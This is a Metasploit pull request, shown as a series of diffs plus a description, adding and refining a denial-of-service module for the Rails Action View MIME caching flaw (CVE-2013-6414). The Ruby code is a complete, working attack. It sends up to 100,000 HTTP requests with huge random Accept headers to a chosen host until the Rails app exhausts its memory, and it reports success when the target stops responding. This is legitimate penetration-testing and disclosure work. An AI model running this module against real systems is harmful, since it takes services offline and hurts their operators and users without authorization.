### PR TITLE
Ruby on Rails Action View Denial of Service (CVE-2013-6414)

### DIFF
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
+      'Description'    => %q{
+        This module exploits a Denial of Service (DoS) condition in the handling of MIME caching
+        of Action View. By sending a specially crafted content-type header to a rails application,
+        it is possible for it to store the invalid MIME type, and may eventually consumes all
+        memory if enough invalid MIMEs are given.
+
+        Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
+      },
+      'Author'         =>
+        [
+          'Toby Hsieh', # Reported the issue
+          'joev',       # Metasploit
+          'sinn3r'      # Metasploit
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-6414' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
+          [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
+        ],
+      'DisclosureDate' => 'Dec 04 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 20000]),
+        OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
+      ],
+    self.class)
+  end
+
+  def host
+      host = datastore['RHOST']
+      host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
+      host
+  end
+
+  def long_string
+    Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
+  end
+
+  def http_request
+    http = ''
+    http << "GET / HTTP/1.1\r\n"
+    http << "Host: #{host}\r\n"
+    http << "Content-Type: application/#{long_string}\r\n"
+    http << "\r\n"
+
+    http
+  end
+
+  def run
+    payload = http_request
+    begin
+      print_status("Stressing the target memory, this will take a lot of time...")
+      connect
+      datastore['RLIMIT'].times { sock.put(payload) }
+      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_status("Unable to connect to #{host}.")
+    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
+      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
+    ensure
+      disconnect
+    end
+  end
+end

--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
     uri = normalize_uri(datastore['URIPATH'])
 
     http = ''
-    http << "GET /#{uri} HTTP/1.1\r\n"
+    http << "GET #{uri} HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
     http << "Accept: #{long_string}\r\n"
     http << "\r\n"

--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
     uri = "/#{uri}" if uri !~ /^\//
 
     http = ''
-    http << "GET /#{datastore['URIPATH']} HTTP/1.1\r\n"
+    http << "GET /#{uri} HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
     http << "Accept: #{long_string}\r\n"
     http << "\r\n"

--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -38,10 +38,11 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('URIPATH',    [true, 'The URI that routes to a Rails controller action', '/']),
-        OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
-        OptInt.new('REQ_COUNT',     [true, 'Number of HTTP requests for each iteration', 500]),
-        OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
+        OptString.new('URIPATH',     [true, 'The URI that routes to a Rails controller action', '/']),
+        OptInt.new('MAXSTRINGSIZE',  [true, 'Max string size', 60000]),
+        OptInt.new('REQCOUNT',       [true, 'Number of HTTP requests to pipeline per connection', 1]),
+        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000]),
+        OptInt.new('PROGRESS_TIMER', [true, 'Number of seconds between each progress update', 10])
       ],
     self.class)
   end
@@ -88,10 +89,10 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     begin
-      print_status("Stressing the target memory, this will take a very long time...")
+      print_status("Stressing the target memory, this will take quite some time...")
       datastore['RLIMIT'].times { |i|
         connect
-        datastore['REQ_COUNT'].times { sock.put(http_request) }
+        datastore['REQCOUNT'].times { sock.put(http_request) }
         disconnect
       }
 

--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def http_request
     http = ''
-    http << "GET /blah HTTP/1.1\r\n"
+    http << "GET /#{Rex::Text.rand_text_alpha(6)} HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
     http << "Accept: #{long_string}\r\n"
     http << "\r\n"

--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
     new_str = new_str.gsub!("//", "/") while new_str.index("//")
 
     # Makes sure there's a starting slash
-    unless new_str[0,1] == '/'
+    unless new_str.start_with?("/")
       new_str = '/' + new_str
     end
 

--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
       'Name'           => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
       'Description'    => %q{
         This module exploits a Denial of Service (DoS) condition in the handling of MIME caching
-        of Action View. By sending a specially crafted content-type header to a rails application,
+        of Action View. By sending a specially crafted 'Accept' header to a rails application,
         it is possible for it to store the invalid MIME type, and may eventually consumes all
         memory if enough invalid MIMEs are given.
 

--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('URIPATH',     [true, 'The URI that routes to a Rails controller action', '/']),
         OptInt.new('MAXSTRINGSIZE',  [true, 'Max string size', 60000]),
         OptInt.new('REQCOUNT',       [true, 'Number of HTTP requests to pipeline per connection', 1]),
-        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000]),
-        OptInt.new('PROGRESS_TIMER', [true, 'Number of seconds between each progress update', 10])
+        OptInt.new('RLIMIT',         [true, 'Number of requests to send', 100000])
       ],
     self.class)
   end


### PR DESCRIPTION
This module exploits a Denial of Service (DoS) condition in the handling of MIME caching of Action View. By sending a specially crafted accept header to a rails application, it is possible for it to store the invalid MIME type, and may eventually consume all memory if enough invalid MIMEs are given.

Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.

DoS takes a ~~very very~~ long time. Run your rails app and watch the memory usage grow slowly (this is also one of the reasons we decided not to use HttpClient because the send_recv makes it even slower).

I think @todb-r7 really wants this.
